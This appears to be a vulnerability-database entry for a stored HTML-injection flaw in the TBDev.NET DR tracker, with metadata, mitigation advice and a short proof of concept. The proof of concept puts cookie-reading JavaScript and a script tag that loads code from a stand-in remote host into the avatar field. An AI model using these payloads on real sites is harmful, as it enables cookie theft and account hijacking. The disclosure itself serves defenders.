HTML-injection vulnerability in TBDev.NET DR

vendor:

TBDev.NET DR

by:

Unknown

7.5

CVSS

HIGH

HTML-injection

CWE

Product Name: TBDev.NET DR

Affected Version From: 10306

Affected Version To: 10306

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

Unknown

HTML-injection vulnerability in TBDev.NET DR

TBDev.NET DR is prone to an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied input data. Exploiting this issue may allow an attacker to execute HTML and script code in the context of the affected site, to steal cookie-based authentication credentials, or to control how the site is rendered to the user; other attacks are also possible.

Mitigation:

Ensure that all user-supplied input is properly validated and sanitized to prevent HTML-injection attacks.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/24923/info

TBDev.NET DR is prone to an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied input data.

Exploiting this issue may allow an attacker to execute HTML and script code in the context of the affected site, to steal cookie-based authentication credentials, or to control how the site is rendered to the user; other attacks are also possible.

TBDev.NET DR 010306 and prior versions are vulnerable. 

version 11-10-05-BETA-SF1:111005 <=

 $avatar = $_POST["avatar"];

 where

 $_POST["avatar"]=javascript:alert(document.cookie);
  or
 $_POST["avatar"]="><script 
src=http://urlmaliciousJavaScript></script><";

-> last version  <= 010306
$_POST["avatar"]=javascript:alert(document.cookie);

go to
http://torrentvictim/userdetails.php?id=malicioususerprofileid
the souce code is:
...<tr><td class=rowhead>Avatar</td><td align=left><img src="\"><script
src=http://urlmaliciousJavaScript><script><\""></td></tr>...

or

...<tr><td class=rowhead>Avatar</td><td align=left><img
src="javascript:alert(document.cookie);"></td></tr>...